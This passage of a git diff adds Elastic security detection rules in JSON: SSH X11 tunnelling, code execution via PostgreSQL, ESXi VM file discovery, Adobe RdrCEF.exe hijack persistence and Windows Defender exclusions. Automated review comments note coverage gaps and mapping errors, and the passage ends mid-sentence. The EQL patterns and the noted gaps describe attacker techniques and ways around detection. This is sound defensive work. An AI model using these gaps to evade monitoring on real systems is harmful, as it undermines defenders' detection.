Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count >= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "29f0cf93-d17c-4b12-b4f3-a433800539fa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + 
"reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "29f0cf93-d17c-4b12-b4f3-a433800539fa_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json new file mode 100644 index 00000000000..2bc8ce6ac3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json 
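Review bot: `process.args in ("-X", "-Y")` in the `query` is an exact term match, so the rule only sees the bare flags; ssh accepts the same options combined with other short options in one token and as an `-o` configuration option, and neither form produces a `-X`/`-Y` argument for this match. If that is a deliberate precision trade-off for a BBR rule, a sentence in `description` or `note` stating that only the standalone `-X`/`-Y` arguments are covered would save the next reader from assuming full coverage; otherwise `process.args : ("-X", "-Y", "-*X*", "-*Y*")` is one way to widen it, at the cost of more `process.args` hits to triage. Also, `-X`/`-Y` are client-side options, so `sshd` in `process.name in ("ssh", "sshd")` presumably never matches this condition and could be dropped or explained in a comment (inferred from the option semantics, not verified from the page).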
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Code Execution via Postgresql", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"fork\", \"fork_event\") and \nuser.name == \"postgres\" and (\n (process.parent.args : \"*sh\" and process.parent.args : \"echo*\") or \n (process.args : \"*sh\" and process.args : \"echo*\")\n) and not process.parent.name : \"puppet\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2a692072-d78d-42f3-a48a-775677d79c4e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated 
into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "2a692072-d78d-42f3-a48a-775677d79c4e_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json new file mode 100644 index 00000000000..412e5cf62f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json 
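Review bot: The `description` string ends with a duplicated clause — `which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions` — which reads as a copy-paste artefact; `..., which can result in unauthorized access and facilitate post-exploitation activities.` says the same thing once. The `setup` string also links the agent-policy guide at a version-pinned `fleet/8.10/` URL while every other link in the same string uses `current`, so that one reference will go stale; the same pinned link appears in the ESXI Discovery via Grep rule (`2b662e21-...-a6eb9b235ec4_6`) in the next hunk. These files are presumably exported from the upstream rule source, so the wording fixes belong there rather than in this package copy.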
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as \"vmdk\", \"vmx\", \"vmxf\", \"vmsd\", \"vmsn\", \"vswp\", \"vmss\", \"nvram\", or \"vmem\". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Discovery via Grep", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"grep\", \"egrep\", \"pgrep\") and process.args in (\n \"vmdk\", \"vmx\", \"vmxf\", \"vmsd\", \"vmsn\", \"vswp\", \"vmss\", \"nvram\", \"vmem\"\n)\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2b662e21-dc6e-461e-b5cf-a6eb9b235ec4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic 
Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json new file mode 100644 index 00000000000..50c8dc4064b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json 
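Review bot: The `threat` mapping here is T1518 Software Discovery, but the `description` and `query` describe a grep for VM file types (`vmdk`, `vmx`, `vmxf`, …), which is enumeration of files on disk rather than of installed software; T1083 File and Directory Discovery looks like the closer technique, so it is worth confirming the intended mapping with the rule author before this version ships. If T1518 is deliberate, a sentence in `description` explaining why the VM-file search is treated as software discovery would stop the next reader raising the same question.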
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects writing executable files that will be automatically launched by Adobe on launch.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adobe Hijack Persistence", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", + "references": [ + "https://twitter.com/pabraeken/status/997997818362155008" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: 
Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.010", + "name": "Services File Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/010/" + } + ] + }, + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2bf78aa2-9c56-48de-b139-f169bf99cf86_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json new file mode 100644 index 00000000000..2448baa8a41 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json 
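Review bot: The last investigation step in `note` tells analysts to look for 4624 logon events `after the registry modification`, but the `query` is a `file where ... event.type == "creation"` rule on `RdrCEF.exe` and references no registry key, so the phrase appears to be carried over from a different guide; `after the file creation` would match what this rule actually triggers on. The same sentence is repeated in the `_111` copy of this rule in the next hunk, whose only material change is narrowing `index` to `logs-endpoint.events.file-*`. The `description` is also awkward: `Detects writing executable files that will be automatically launched by Adobe on launch.` would read better as `Detects writing executable files that Adobe Acrobat Reader will automatically launch.`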
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects writing executable files that will be automatically launched by Adobe on launch.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adobe Hijack Persistence", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", + "references": [ + "https://twitter.com/pabraeken/status/997997818362155008" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: 
Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.010", + "name": "Services File Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/010/" + } + ] + }, + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2bf78aa2-9c56-48de-b139-f169bf99cf86_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json new file mode 100644 index 00000000000..9c4cab2e24a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Exclusions Added via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is used to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration settings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of the more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/) was observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure exclusions. In order to validate 